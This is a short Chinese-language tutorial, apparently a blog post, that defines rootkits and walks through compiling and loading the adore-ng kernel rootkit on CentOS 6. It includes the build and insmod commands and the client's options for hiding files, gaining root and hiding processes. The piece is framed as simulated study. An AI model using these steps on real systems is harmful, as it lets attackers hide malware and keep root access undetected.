Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。
而我们今天要模拟学习的就是与它很像的恶意软件 Rootkit 其中之一:adore-ng
环境:Centos 6
这里需要的用到的两个资源(可下载):
安装 adore-ng
安装依赖:kernel-devel-2.6
[root@Fp-01 ~]# yum -y install kernel-devel-2.6.32-754.27.1.el6.x86_64.rpm
Loaded plugins: fastestmirror, security
Setting up Install Process
……
Installed:
kernel-devel.x86_64 0:2.6.32-754.27.1.el6
Complete!
解压安装 adore-ng
[root@Fp-01 ~]# unzip adore-ng-master.zip
[root@Fp-01 ~]# cd adore-ng-master
[root@Fp-01 adore-ng-master]# ll
-rw-r--r--. 1 root root 1143 Dec 30 2015 Makefile
# 已经有 makefile 文件,直接 make -j 4 编译即可
[root@Fp-01 adore-ng-master]# make -j 4
加载模块
[root@Fp-01 adore-ng-master]# insmod adore-ng.ko
查看帮助
[root@Fp-01 adore-ng-master]# ./ava
I print info (secret UID etc)
h hide file # 隐藏文件
u unhide file # 取消隐藏文件
r execute as root # 以root用户执行
R remove PID forever # 永久删除PID
U uninstall adore